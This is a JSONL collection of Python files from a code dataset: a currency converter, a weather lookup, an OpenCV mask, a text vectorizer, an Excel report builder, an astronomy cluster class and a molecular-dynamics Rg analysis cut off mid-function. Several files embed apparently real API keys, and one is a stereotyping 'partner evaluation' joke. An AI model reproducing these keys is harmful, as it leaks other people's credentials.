+{"seq_id":"19573105","text":"class Man:\n "Ideal partner evaluation. 100% reliable."\n\n def __init__(self,salary, your_salary): # (self, age, car, salary, debts)\n self.salary = salary\n self.your_salary = your_salary\n\n def count_money(self):\n\n if self.salary <= self.your_salary:\n print('No money. Dump him.')\n elif self.salary <= 1.5*self.your_salary:\n print('Not very suitable for you. Little money, no perspective.')\n elif self.salary <= 3*self.your_salary:\n print("Your target is capable of buying you new clothes every week.\nVery suitable for you.")\n else:\n print('Marry him. NOW.')\n\nMarek = Man(8000, 0)\nMarek.count_money()\n","sub_path":"classes_for_dummies.py","file_name":"classes_for_dummies.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"3680309","text":"import cv2 as cv\nimport numpy as np\n\nimg = cv.imread("15.jpg")\nhsv = cv.cvtColor(img, cv.COLOR_BGR2HSV)\n\nlower = np.array([120, 102, 102])\nhigh = np.array([123, 106, 107])\nlowerb = np.array([130, 150, 130])\nhighb = np.array([140, 200, 200])\nlowerb1 = np.array([100, 200, 100])\nhighb1 = np.array([200, 255, 200])\n\nmask = cv.inRange(hsv, lower, high)\nprint(mask)\nres = cv.bitwise_and(img, img, mask=mask)\n\ncv.imshow("img", img)\ncv.imshow("mask", mask)\ncv.waitKey(0)\n","sub_path":"untitled1788/opencv/HSV.py","file_name":"HSV.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"10174509","text":"import sys\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nimport requests\n\nclass deneme(QWidget):\n def __init__(self):\n super().__init__()\n self.olayUI()\n def olayUI(self):\n \n \n API_key = "804d4e971d71cf74913729400d0a5885"\n url = "http://data.fixer.io/api/latest?access_key="+API_key\n cevap = requests.get(url)\n self.kurlar = cevap.json()\n \n \n\n self.yazialani = QLabel()\n self.yazialani2 = QLabel()\n self.yazialani3 = QLabel('Eldeki Dövizin Cinsi')\n self.yazialani4 = QLabel('Çevrilecek Dövizin Cinsi')\n self.yazialani5 = QLabel('Tutar')\n self.buton = QPushButton("Cevir")\n self.buton2 = QPushButton("Temizle")\n self.cinsgir1 = QLineEdit()\n self.cinsgir2 = QLineEdit()\n self.tutargir = QLineEdit()\n\n self.yazialani2.setText('Döviz Çevirici, Dolar, Euro, TL, Tüm Dünya Kurları.. 
')\n self.yazialani2.setAlignment(Qt.AlignBottom)\n self.setGeometry(200,75,550,900)\n self.logo = QLabel()\n self.logo.setPixmap(QPixmap("logo.png"))\n self.logo.setAlignment(Qt.AlignCenter)\n\n \n\n\n\n v_box = QVBoxLayout()\n h_box = QHBoxLayout()\n\n v_box.addStretch()\n v_box.addWidget(self.yazialani2)\n v_box.addStretch()\n v_box.addWidget(self.logo)\n v_box.addStretch()\n v_box.addWidget(self.yazialani3)\n v_box.addWidget(self.cinsgir1)\n v_box.addStretch()\n v_box.addWidget(self.yazialani4)\n v_box.addWidget(self.cinsgir2)\n v_box.addStretch()\n v_box.addWidget(self.yazialani5)\n v_box.addWidget(self.tutargir)\n v_box.addStretch()\n v_box.addWidget(self.buton)\n v_box.addStretch()\n v_box.addWidget(self.yazialani)\n v_box.addStretch()\n\n v_box.addWidget(self.buton2)\n v_box.addStretch()\n\n \n h_box.addLayout(v_box)\n h_box.addStretch()\n self.setWindowTitle("DÖVİZ ÇEVİRİ PROGRAMI € $ ₺")\n self.setLayout(h_box)\n\n self.buton.clicked.connect(self.butonclicked)\n self.buton2.clicked.connect(self.temizle)\n self.setWindowIcon(QIcon("h2.png"))\n \n self.show()\n\n def butonclicked(self):\n d_cins = self.cinsgir1.text()\n d_cins2 = self.cinsgir2.text()\n d_cins = d_cins.upper()\n d_cins2 = d_cins2.upper()\n \n kur1 = self.kurlar["rates"][d_cins]\n kur2 = self.kurlar["rates"][d_cins2]\n sonuc = (kur2 / kur1) \n print("kur",sonuc)\n\n bbb = float(self.tutargir.text())\n ccc = sonuc * bbb\n ddd = round(ccc,2)\n self.yazialani.setText(str(ddd))\n \n def temizle(self):\n self.cinsgir1.clear()\n self.cinsgir2.clear()\n self.tutargir.clear()\n self.yazialani.clear()\n \n\napp = QApplication(sys.argv)\npencere = deneme()\nsys.exit(app.exec_())\n","sub_path":"currency_conv_1.0.py","file_name":"currency_conv_1.0.py","file_ext":"py","file_size_in_byte":3212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"117568292","text":"import requests\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('country_code', metavar='N', type=str, help='country code')\nparser.add_argument('-l', type=str, help='name of location')\nparser.add_argument('-i', type=int, help='id location')\np = parser.parse_args()\n\nif p.i is not None:\n r = requests.get(\n 'http://api.openweathermap.org/data/2.5/weather?id={0}&appid=ff9853a87b307198d1cb16c5265804dd'.format(\n p.i))\n r_temp = dict(r.json())['main']['temp'] - 273.15\n s = 'Current temp: {0:.3}{1}C'.format(r_temp, '\u00B0') # degree sign; repr('u00B0') printed the quoted literal instead\n print(s)\nelif p.l is not None:\n r = requests.get(\n 'http://api.openweathermap.org/data/2.5/weather?q={0},{1}&appid=ff9853a87b307198d1cb16c5265804dd'.format(\n p.l, p.country_code))\n r_temp = dict(r.json())['main']['temp'] - 273.15\n s = 'Current temp: {0:.3}{1}C'.format(r_temp, '\u00B0') # degree sign (U+00B0)\n print(s)","sub_path":"lect_6/lect_6_1.py","file_name":"lect_6_1.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"323320191","text":"#!/usr/bin/env python\n\nimport re\nimport json\nimport numpy as np\nfrom keras.preprocessing.text import Tokenizer\n\n# RegEx patterns\nERRLINE_RE = re.compile(r':\d*\)')\nkeepPunct_RE = r'|\||\&|\#|\@|\~|\_|\'|\"|\=|\\|\/|\-|\:|\;|\*|\.|\$|\(|\)|\[|\]|\{|\}'\nTOKEN_PATTERN = re.compile(r'(?u)\b\w\w+\b' + keepPunct_RE)\n\n# Lambda functions\ntokenize = lambda line: TOKEN_PATTERN.findall(line)\nerrline = lambda line: ERRLINE_RE.sub(':_xerrx_)', line)\n\n# Out Of Vocabulary default token 
value\n#oov = 11999\n\n\nclass Vectorizer:\n def __init__(self, oov_val=11999, dictionary_path=None):\n self.oov = oov_val\n self.token_dict = None\n if dictionary_path:\n self.token_dict = self.read_dict(dictionary_path)\n\n def read_dict(self, dict_path):\n with open(dict_path, 'r') as _in:\n return json.load(_in)\n\n def dump_dict(self, output_path):\n with open(output_path, 'w') as out:\n json.dump(self.token_dict, out, indent=2)\n\n def build_dict(self, doc_path):\n token = Tokenizer(filters='')\n posts = []\n with open(doc_path, 'r') as f:\n for line in f:\n posts.append(' '.join(tokenize(errline(line.strip().lower()))))\n # fit tokenizer on posts and create token index\n token.fit_on_texts(posts)\n self.token_dict = token.word_index\n\n def vectorize_doc(self, doc_path):\n # encode post tokens using the provided dictionary\n enc_doc = []\n with open(doc_path, 'r') as f:\n for line in f:\n enc_doc.append(self.vectorize_string(line))\n return enc_doc\n\n def vectorize_list(self, doc_list):\n enc_doc = []\n for line in doc_list:\n enc_doc.append(self.vectorize_string(line))\n return enc_doc\n\n def vectorize_string(self, string):\n string = ' '.join(tokenize(errline(string.strip().lower())))\n return np.array(\n [self.token_dict.get(t, self.oov) for t in string.split()])\n\n\nif __name__ == '__main__':\n # build token dictionary on the selected and labeled posts\n vectorizer = Vectorizer()\n vectorizer.build_dict('training_data/raw_data/labeled_posts')\n vectorizer.dump_dict('data/token_dictionary.json')\n","sub_path":"src/post_classifier/vectorizer.py","file_name":"vectorizer.py","file_ext":"py","file_size_in_byte":2237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"262908196","text":"import os\nimport shutil\nimport calendar\nimport openpyxl\nfrom openpyxl import Workbook\nfrom openpyxl.styles import PatternFill, Border, Side, Alignment, Protection, Font\nfrom openpyxl.utils import get_column_letter\n\nmonth = [None, 'янв.', 'фев.', 'мар.', 'апр.', 'май.', 'июн.', 'июл.', 'авг.', 'сен. 
', 'окт.', 'ноя.', 'дек.']\noriginal_header = ['Порядковый №', 'Сотрудник (Посетитель)', 'Дата', 'Время', 'Подразделение', 'Событие',\n 'Устройство', 'Помещение', 'Пользователь', 'Категория события', 'Подкатегория события',\n 'Дата и время записи']\ndate = calendar.Calendar()\ncontractors = {}\n\n\ndef parsing(filename, day_month):\n wb = openpyxl.load_workbook(filename)\n sheet = wb.active\n rows = sheet.max_row\n columns = sheet.max_column\n header = [row.value for row in sheet[4]]\n if header == original_header:\n for row in range(5, rows + 1):\n string = ''\n for column in range(2, columns + 1):\n cell = sheet.cell(row=row, column=column)\n string = string + str(cell.value) + ';'\n string = string.split(';')\n sorted(string, day_month)\n else:\n print('Неправильный формат отчета')\n\n\ndef sorted(string, day_month):\n person = string[0]\n date = string[1]\n day = int(date.split('.')[0])\n contract = string[3]\n zone = string[6]\n if contract not in contractors.keys():\n contractors[contract] = {\n zone: {\n 'total_month': 1,\n 'total_day': [0] * day_month,\n date: {\n 'day_people': 1,\n 'person': [person]\n }\n }\n }\n contractors[contract][zone]['total_day'][day - 1] += 1\n else:\n if zone not in contractors[contract].keys():\n contractors[contract][zone] = {\n 'total_month': 1,\n 'total_day': [0] * day_month,\n date: {\n 'day_people': 1,\n 'person': [person]\n }\n }\n contractors[contract][zone]['total_day'][day - 1] += 1\n elif date not in contractors[contract][zone].keys():\n contractors[contract][zone][date] = {'day_people': 1, 'person': [person]}\n contractors[contract][zone]['total_month'] += 1\n contractors[contract][zone]['total_day'][day - 1] += 1\n else:\n if person not in contractors[contract][zone][date]['person']:\n contractors[contract][zone][date]['person'].append(person)\n contractors[contract][zone][date]['day_people'] += 1\n contractors[contract][zone]['total_month'] += 1\n contractors[contract][zone]['total_day'][day - 1] += 1\n\n\n\ndef create_file(filename, filepath, date_list):\n filename = filename.split('/')[1]\n\n font = Font(name='Times New Roman',\n size=12,\n bold=False,\n italic=False,\n vertAlign=None,\n underline='none',\n strike=False,\n color='FF000000')\n\n font_top = Font(name='Times New Roman',\n size=12,\n bold=True,\n italic=False,\n vertAlign=None,\n underline='none',\n strike=False,\n color='FF000000')\n\n border = Border(left=Side(border_style='thin',\n color='FF000000'),\n right=Side(border_style='thin',\n color='FF000000'),\n top=Side(border_style='thin',\n color='FF000000'),\n bottom=Side(border_style='thin',\n color='FF000000'),\n diagonal=Side(border_style='thin',\n color='FF000000'),\n diagonal_direction=0,\n outline=Side(border_style='thin',\n color='FF000000'),\n vertical=Side(border_style='thin',\n color='FF000000'),\n horizontal=Side(border_style='thin',\n color='FF000000')\n )\n\n align_center = Alignment(horizontal='center',\n vertical='bottom',\n text_rotation=0,\n wrap_text=False,\n shrink_to_fit=False,\n indent=0)\n\n align_top = Alignment(horizontal='center',\n vertical='center',\n text_rotation=0,\n wrap_text=False,\n shrink_to_fit=False,\n indent=0)\n\n wb = Workbook()\n ws = wb.active\n position = {} # Временное хранилище позиций в таблице в зависимости от территории\n wb.remove(wb.active) # Удаление дефолтного листа\n for contractor in contractors.keys():\n for zone in contractors[contractor].keys():\n col = 5\n if zone not in wb.sheetnames: # Если в книге нет листа территории\n position[zone] = {'start_row': 5, 
'start_column': 2, 'index': 1, 'day': 5} # Обозначение стартовых позиций\n ws = wb.create_sheet(zone)\n\n ws['E2'] = 'Отчет нахождения на объекте {}'.format(filename)\n ws['E2'].font = font_top\n # ---------------#\n ws['B4'] = '№'\n ws.column_dimensions['B'].width = 5\n # ---------------#\n ws['C4'] = 'Подрядчик'\n ws.column_dimensions['C'].width = 35\n # ---------------#\n ws['D4'] = 'Человек за месяц'\n ws.column_dimensions['D'].width = 19\n # ---------------#\n for i in date_list:\n ws.cell(row=4, column=col).value = i\n col += 1\n ws = wb[zone] # Выбрать активным лист согласно территории\n ws.cell(row=position[zone]['start_row'],\n column=position[zone]['start_column']).value = position[zone]['index']\n ws.cell(row=position[zone]['start_row'],\n column=position[zone]['start_column']+1).value = contractor\n ws.cell(row=position[zone]['start_row'],\n column=position[zone]['start_column']+2).value = contractors[contractor][zone]['total_month']\n for day_value in contractors[contractor][zone]['total_day']:\n ws.cell(row=position[zone]['start_row'], column=position[zone]['day']).value = day_value\n position[zone]['day'] += 1\n position[zone]['day'] = 5\n position[zone]['index'] = position[zone]['index'] + 1\n position[zone]['start_row'] = position[zone]['start_row'] + 1\n\n for sheet in wb.sheetnames:\n ws = wb[sheet]\n for row in range(4, ws.max_row+1):\n for column in range(2, ws.max_column+1):\n cell = ws.cell(row=row, column=column)\n cell.border = border\n cell.font = font\n if row >= 4 and column == 2: # Форматирования столбца №\n cell.alignment = align_center\n if row == 4 and column >= 2:\n cell.font = font_top\n cell.alignment = align_top\n if column >= 5:\n i = get_column_letter(column)\n ws.column_dimensions[i].width = 10\n wb.save(filepath)\n\ndef start():\n folders = [folder for folder in os.walk('Отчеты')]\n for folder in folders[1:]:\n for file in folder[2]:\n if file.endswith('.xlsx') and file.startswith('События') and not folder[0].endswith('old'):\n file_month = month.index(file.split(' ')[-3])\n file_year = int(file.split(' ')[-2])\n date_list = []\n for i in date.itermonthdates(file_year, file_month):\n if i.month == file_month:\n date_list.append(i.strftime('%d.%m.%Y'))\n perco_file = os.path.join('', folder[0], file)\n print('Файл {}'.format(perco_file))\n parsing(perco_file, len(date_list))\n create_file(folder[0],\n os.path.join('', folder[0], 'Отчет нахождения на объекте {}'.format(' '.join(file.split(' ')[1:]))),\n date_list)\n contractors.clear()\n shutil.copy2(perco_file, os.path.join(folder[0], 'old', file))\n os.remove(perco_file)\n\n\nif __name__ == \"__main__\":\n start()\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"522799800","text":"import requests \nimport json\n\ndef return_category(para):\n r1 = requests.post('https://pribot.org/api/getCategories',\n json={'key': 'xXaJt4QsteETBAa8UY4G4QZeMHRK7upUdf2XrFQZQpN', 'texts': [para]},\n headers={'Content-Type': 'application/json'},\n cookies={},)\n \n resp = r1.json()\n\n #Saving category labels (in order of confidence 0 is most, etc...)\n cat_strs = resp['category_classes']\n cat_strs_list = cat_strs.split(\",\")\n cat_strs_list_cleaned = []\n for item in cat_strs_list:\n clean = item.replace(\" \",\"\")\n cleaner = clean.replace(\"[[\",\"\")\n cleanest = cleaner.replace(\"'\",\"\")\n ultra_clean = cleanest.replace(\"]]\",\"\")\n 
 cat_strs_list_cleaned.append(ultra_clean)\n\n #Saving category confidence scores (in same order as above...)\n cat_scores = resp['category_scores']\n cat_scores_list = cat_scores.split(\",\")\n cat_scores_list_cleaned = []\n for item in cat_scores_list:\n clean = item.replace(\" \",\"\")\n cleaner = clean.replace(\"[[\",\"\")\n cleanest = cleaner.replace(\"'\",\"\")\n ultra_clean = cleanest.replace(\"]]\",\"\")\n cat_scores_list_cleaned.append(ultra_clean)\n #print type(cat_scores_list_cleaned[0])\n\n cat_score_over = []\n cat_over = []\n\n for i in range(len(cat_strs_list_cleaned)):\n if float(str(cat_scores_list_cleaned[i])) >= .7:\n cat_over.append(cat_strs_list_cleaned[i])\n #print(cat_scores_list_cleaned[i])\n #print(\"---------------------------\")\n #print(cat_strs_list_cleaned[i])\n #print(\"---------------------------\")\n cat_score_over.append(cat_scores_list_cleaned[i])\n\n to_return = (para, zip(cat_over, cat_score_over), cat_over)\n\n #print(\"------------------------------------------\")\n #print(to_return[2])\n results = list(zip(cat_over,cat_score_over))\n return results\n'''\ntotal_count = 100\nsuccess_count = 0\ntest_results = []\nfor i in range(total_count):\n orig_text = raw_input(\"What piece of text would you like to test?... \\n\")\n orig_result = return_category(orig_text)\n\n adv_text = raw_input(\"What piece of adversarial text would you like to test... \\n\")\n adv_result = return_category(adv_text)\n\n test_results.append((orig_result, adv_result))\n\n to_compare = orig_result[2]\n to_compare2 = adv_result[2]\n\n results_add = set(to_compare + to_compare2)\n\n if len(results_add) == (len(to_compare2) + len(to_compare)):\n success_count+=1\n\nsuccess_rate = (success_count/total_count) * 100\n\n#print success_rate\n'''\n\n","sub_path":"accuracy_check.py","file_name":"accuracy_check.py","file_ext":"py","file_size_in_byte":2475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"526892973","text":"\"\"\"@file galaxycluster.py\nThe GalaxyCluster class\n\"\"\"\nimport pickle\nfrom .gcdata import GCData\n\nclass GalaxyCluster():\n \"\"\"Object that contains the galaxy cluster metadata and background galaxy data\n\n Attributes\n ----------\n unique_id : int or string\n Unique identifier of the galaxy cluster\n ra : float\n Right ascension of galaxy cluster center (in degrees)\n dec : float\n Declination of galaxy cluster center (in degrees)\n z : float\n Redshift of galaxy cluster center\n galcat : GCData\n Table of background galaxy data containing at least galaxy_id, ra, dec, e1, e2, z\n \"\"\"\n def __init__(self, *args, **kwargs):\n self.unique_id = None\n self.ra = None\n self.dec = None\n self.z = None\n self.galcat = None\n if len(args)>0 or len(kwargs)>0:\n self._add_values(*args, **kwargs)\n self._check_types()\n def _add_values(self, unique_id: str, ra: float, dec: float, z: float,\n galcat: GCData):\n \"\"\"Add values for all attributes\"\"\"\n self.unique_id = unique_id\n self.ra = ra\n self.dec = dec\n self.z = z\n self.galcat = galcat\n return\n def _check_types(self):\n \"\"\"Check types of all attributes\"\"\"\n if isinstance(self.unique_id, (int, str)): # should unique_id be a float?\n self.unique_id = str(self.unique_id)\n else:\n raise TypeError(f'unique_id incorrect type: {type(self.unique_id)}')\n try:\n self.ra = float(self.ra)\n except ValueError:\n raise TypeError(f'ra incorrect type: {type(self.ra)}')\n try:\n self.dec = float(self.dec)\n except ValueError:\n raise TypeError(f'dec incorrect type: 
{type(self.dec)}')\n try:\n self.z = float(self.z)\n except ValueError:\n raise TypeError(f'z incorrect type: {type(self.z)}')\n if not isinstance(self.galcat, GCData):\n raise TypeError(f'galcat incorrect type: {type(self.galcat)}')\n\n if not -360. <= self.ra <= 360.:\n raise ValueError(f'ra={self.ra} not in valid bounds: [-360, 360]')\n if not -90. <= self.dec <= 90.:\n raise ValueError(f'dec={self.dec} not in valid bounds: [-90, 90]')\n if self.z < 0.:\n raise ValueError(f'z={self.z} must be greater than 0')\n return\n def save(self, filename, **kwargs):\n \"\"\"Saves GalaxyCluster object to filename using Pickle\"\"\"\n with open(filename, 'wb') as fin:\n pickle.dump(self, fin, **kwargs)\n return\n def load(filename, **kwargs):\n \"\"\"Loads GalaxyCluster object to filename using Pickle\"\"\"\n with open(filename, 'rb') as fin:\n self = pickle.load(fin, **kwargs)\n self._check_types()\n return self\n def __repr__(self):\n \"\"\"Generates string for print(GalaxyCluster)\"\"\"\n output = f'GalaxyCluster {self.unique_id}: ' +\\\n f'(ra={self.ra}, dec={self.dec}) at z={self.z}\\n' +\\\n f'> {len(self.galcat)} source galaxies\\n> With columns:'\n for colname in self.galcat.colnames:\n output += f' {colname}'\n return output\n","sub_path":"clmm/galaxycluster.py","file_name":"galaxycluster.py","file_ext":"py","file_size_in_byte":3238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"391120413","text":"import sys\nsys.path.append('/home/mnguyen/bin/scripts/')\nimport stats\nimport numpy as np\nimport matplotlib, sys, os\nimport matplotlib.pyplot as plt\nimport MDAnalysis as mda\nimport mdtraj as md\nimport log2txt\nshowPlots = True\ntry:\n os.environ[\"DISPLAY\"] #Detects if display is available\nexcept KeyError:\n showPlots = False\n matplotlib.use('Agg') #Need to set this so doesn't try (and fail) to open interactive graphics window\n\n\nautowarmup = True\n#defulat warmup samples if not using autowarmup\nwarmup = 100\n\ntrajFiles = ['trajectory298.dcd']\ntops = ['AA12_f0.25_opc_gaff2_w0.13.parm7']\nstride = 5\n\n#names of residue in polymer chain\n#resInChain = ['AHP','AP', 'ATP']\nDOPs = [12]\nNPs = [15]\n#index of first polymer residue\nres0Id = 0\nN_av = 6.022e23 #1/mol\nkB = 0.008314265 #kJ/mol/K\n#########################End of input######################\ndef GetThermo(ThermoLog, fi = 'lammps', obs = None, cols = None, autowarmup = True, warmup = 100):\n \"\"\" fi: log file format, 'lammps' or 'openmm' \"\"\"\n if not obs == None and not cols == None:\n Exception('Read data either by observable name or column index but not both!')\n\n #conver log file:\n if fi == 'openmm':\n ThermoLog = log2txt.log2txt_openmm([ThermoLog])[0]\n elif fi == 'lammps':\n section = 'PRODUCTION RUNS'\n ThermoLog = log2txt.log2txt_lammps([ThermoLog],section,'production')[0]\n\n print('new log file: {}'.format(ThermoLog))\n txt = \"\"\n obsID = []\n Stats = []\n #do stats\n file = open(ThermoLog,'r')\n if not obs == None:\n lines = file.readlines()\n while not isinstance(cols,list):\n for line in lines:\n if line.startswith('#'):\n obsNames = line.split()[1:]\n print('obsNames {}'.format(obsNames))\n cols = [obsNames.index(val) for val in obsNames if val in obs]\n print('cols {}'.format(cols))\n for i, col in enumerate(cols):\n if autowarmup:\n warmup,Data,nwarmup = stats.autoWarmupMSER(file, col)\n print (\"Auto warmup detection with MSER-5 => \",nwarmup)\n else:\n warmup,Data = stats.extractData(file, col, warmup)\n 
(nsamples,(min,max),mean,semcc,kappa,unbiasedvar,autocor)=stats.doStats(warmup,Data, False ,False,'_{0}_mol{1}'.format(file.name,col))\n try:\n obsName = obsNames[col]\n except:\n obsName = 'col{}'.format(col)\n lines = \"\" \n lines += '\\n==== {} ===='.format(obsName)\n lines += \"\\n - Mean = {} +/- {}\".format(mean,semcc)\n lines += \"\\n - Equilibrated samples = {}\".format(nsamples)\n lines += \"\\n - Correlation time = {}\".format(kappa)\n lines += \"\\n - Effective # samples = {}\".format(nsamples/kappa)\n lines += \"\\n - Reduced-bias variance = {}\".format(unbiasedvar)\n # note that there is no unbiased estimator for the population standard deviation. We can use sqrt(var) as a indicative estimator.\n lines += \"\\n - S.D. (unbiased, biased) = {} {}\".format(np.sqrt(unbiasedvar),np.std(Data,ddof=0)) # ddof is correction to 1/N...using ddof=1 returns regular reduced-bias estimator\n lines += \"\\n - Min, Max = {} {}\\n\".format(min,max)\n\n print(lines)\n txt += lines\n \n Avg = mean\n Std = np.sqrt(unbiasedvar)\n Err = semcc\n CorrTime = kappa \n NUncorrSamples = nsamples/kappa\n Stats.append([Avg,Std,CorrTime,Err,NUncorrSamples])\n obsID.append(obsName)\n\n return obsID, Stats\n \ndef GetRgRee(trajFile, top, DOP, NP, NAtomsPerChain = None, \n RgDatName = 'RgTimeSeries', ReeDatName = 'ReeTimeSeries',RgStatOutName = 'RgReeStats', Ext='.dat', \n res0Id = 0, stride = 1, autowarmup = True, warmup = 100, plot = False, fi = 'openmm', unit = 'real'): \n \n \"\"\"NAtomsPerChain: used if running CG system, if provided will assume there is one residue per chain\n multiply coordinates by 10 if input traj was generated by lammps and unit is nonDim\"\"\"\n ElementDictionary ={\n \"carbon\": 12.01,\n \"hydrogen\": 1.008,\n \"oxygen\": 16.00,\n \"nitrogen\": 14.001,\n \"virtual site\": 1.0,\n \"virtual_site\": 1.0,\n \"sodium\": \"na+\"}\n\n traj = md.load(trajFile, top=top, stride = stride)\n traj.make_molecules_whole(inplace=True, sorted_bonds=None) # Automatically finds the bonds from the topology file\n if fi == 'lammps' and unit == 'nonDim':\n traj.xyz *= 10.\n traj.unitcell_lengths *= 10\n\n RgStats = []\n RgTimeseries = [range(traj.n_frames)]\n Rgheader = \"Frame \"\n txtRg = \"\"\n \n ReeStats = []\n ReeTimeseries = [range(traj.n_frames)]\n Reeheader = \"Frame \"\n \n #get indices of residues in all chains \n MoleculeResidueList = []\n if not NAtomsPerChain:\n #number residues per chain = DOP (for AA systems)\n for j in range(NP):\n resId = range(res0Id + j*DOP, res0Id + (j+1)*DOP)\n MoleculeResidueList.append(resId)\n else:\n #1 residue per chain (for CG system)\n x = range(res0Id, res0Id + NP)\n MoleculeResidueList = [[a] for a in x]\n \n for j,resId in enumerate(MoleculeResidueList):\n resIdLow = np.min(resId)\n resIdUp = np.max(resId)\n atom_indices = traj.topology.select('resid {} to {}'.format(resIdLow,resIdUp)) \n print('Indices of atoms in chain {} \\n{}'.format(j+1,atom_indices))\n mass_list = []\n for index in atom_indices:\n element = str(traj.topology.atom(index).element)\n try:\n mass = ElementDictionary[element]\n except:\n mass = 1.\n mass_list.append(mass)\n mass_list = np.array(mass_list)\n \n '''=== Compute Rg ==='''\n Rg = md.compute_rg(traj.atom_slice(atom_indices),masses=mass_list) \n RgTimeseries.append(Rg.tolist())\n Rgheader += 'Rg{} '.format(j+1)\n np.savetxt(RgDatName+Ext, np.transpose(RgTimeseries), fmt = '%5.5f', header=Rgheader ) \n \n \n #do stats\n file = open(RgDatName+Ext,'r')\n if autowarmup:\n warmup,Data,nwarmup = stats.autoWarmupMSER(file, j+1)\n 
print (\"Auto warmup detection with MSER-5 => \",nwarmup)\n else:\n warmup,Data = stats.extractData(file, j+1, warmup)\n (nsamples,(min,max),mean,semcc,kappa,unbiasedvar,autocor)=stats.doStats(warmup,Data, False ,False,'_{0}_mol{1}'.format(file.name,j+1))\n\n lines = \"\" \n lines += '\\n==== Rg for molecule {} ===='.format(j+1)\n lines += \"\\n - Mean = {} +/- {}\".format(mean,semcc)\n lines += \"\\n - Equilibrated samples = {}\".format(nsamples)\n lines += \"\\n - Correlation time = {}\".format(kappa)\n lines += \"\\n - Effective # samples = {}\".format(nsamples/kappa)\n lines += \"\\n - Reduced-bias variance = {}\".format(unbiasedvar)\n # note that there is no unbiased estimator for the population standard deviation. We can use sqrt(var) as a indicative estimator.\n lines += \"\\n - S.D. (unbiased, biased) = {} {}\".format(np.sqrt(unbiasedvar),np.std(Data,ddof=0)) # ddof is correction to 1/N...using ddof=1 returns regular reduced-bias estimator\n lines += \"\\n - Min, Max = {} {}\\n\".format(min,max)\n print(lines)\n txtRg += lines\n\n RgAvg = mean\n RgStd = np.sqrt(unbiasedvar)\n RgErr = semcc\n CorrTime = kappa \n NUncorrSamples = nsamples/kappa\n RgStats.append([RgAvg,RgStd,CorrTime,RgErr,NUncorrSamples])\n\n# print ('The Rg for molecule {} (mean, error, std)'.format(j))\n# print ('\\t{0:2.4f}\\t{1:2.5f}\\t{1:2.5f}'.format(RgAvg, RgErr, RgStd))\n\n ''' Plot Rg '''\n if plot:\n plt.plot(Rg, \"k-\")\n plt.xlabel('timestep')\n plt.ylabel('Radius-of-gryation')\n plt.savefig(\"Rg{}.png\".format(j+1),bbox_inches='tight')\n plt.close()\n\n '''=== Compute Ree ==='''\n atom_pairs = [np.min(atom_indices), np.max(atom_indices)]\n Ree = md.compute_distances(traj,atom_pairs= [atom_pairs], periodic=False, opt=True)\n Ree = Ree.tolist()\n Ree = [a[0] for a in Ree]\n ReeTimeseries.append(Ree)\n Reeheader += 'Ree{} '.format(j+1)\n np.savetxt(ReeDatName+Ext, np.transpose(ReeTimeseries), fmt = '%5.5f', header=Reeheader ) \n \n #do stats\n file = open(ReeDatName+Ext,'r')\n if autowarmup:\n warmup,Data,nwarmup = stats.autoWarmupMSER(file, j+1)\n print (\"Auto warmup detection with MSER-5 => \",nwarmup)\n else:\n warmup,Data = stats.extractData(file, j+1, warmup)\n (nsamples,(min,max),mean,semcc,kappa,unbiasedvar,autocor)=stats.doStats(warmup,Data, False ,False,'_{0}_mol{1}'.format(file.name,j+1))\n\n lines = \"\" \n lines += '\\n==== Ree for molecule {} ===='.format(j+1)\n lines += \"\\n - Mean = {} +/- {}\".format(mean,semcc)\n lines += \"\\n - Equilibrated samples = {}\".format(nsamples)\n lines += \"\\n - Correlation time = {}\".format(kappa)\n lines += \"\\n - Effective # samples = {}\".format(nsamples/kappa)\n lines += \"\\n - Reduced-bias variance = {}\".format(unbiasedvar)\n # note that there is no unbiased estimator for the population standard deviation. We can use sqrt(var) as a indicative estimator.\n lines += \"\\n - S.D. 
(unbiased, biased) = {} {}\".format(np.sqrt(unbiasedvar),np.std(Data,ddof=0)) # ddof is correction to 1/N...using ddof=1 returns regular reduced-bias estimator\n lines += \"\\n - Min, Max = {} {}\\n\".format(min,max)\n print(lines)\n txtRg += lines\n\n ReeAvg = mean\n ReeStd = np.sqrt(unbiasedvar)\n ReeErr = semcc\n CorrTime = kappa \n NUncorrSamples = nsamples/kappa\n ReeStats.append([ReeAvg,ReeStd,CorrTime,ReeErr,NUncorrSamples])\n\n ''' Plot Ree '''\n if plot:\n plt.plot(Ree, \"k-\")\n plt.xlabel('timestep')\n plt.ylabel('End-to-end distance')\n plt.savefig(\"Ree{}.png\".format(j+1),bbox_inches='tight')\n plt.close()\n\n #get averages of stats\n RgStats = np.array(RgStats)\n RgAvg = np.mean(RgStats[:,0])\n RgStd = np.mean(RgStats[:,1])\n RgCorrTime = np.mean(RgStats[:,2])\n RgErr = np.mean(RgStats[:,3])\n RgErr_Prop = np.sqrt(np.sum(RgStats[:,3]**2))/NP\n RgCorrTimeErr = np.sqrt(np.var(RgStats[:,2])/len(RgStats[:,2]))\n RgNUncorrSamples = np.mean(RgStats[:,4])\n\n ReeStats = np.array(ReeStats)\n ReeAvg = np.mean(ReeStats[:,0])\n ReeStd = np.mean(ReeStats[:,1])\n ReeCorrTime = np.mean(ReeStats[:,2])\n ReeErr = np.mean(ReeStats[:,3])\n ReeErr_Prop = np.sqrt(np.sum(ReeStats[:,3]**2))/NP\n ReeCorrTimeErr = np.sqrt(np.var(ReeStats[:,2])/len(ReeStats[:,2]))\n ReeNUncorrSamples = np.mean(ReeStats[:,4])\n\n lines = \"\"\n 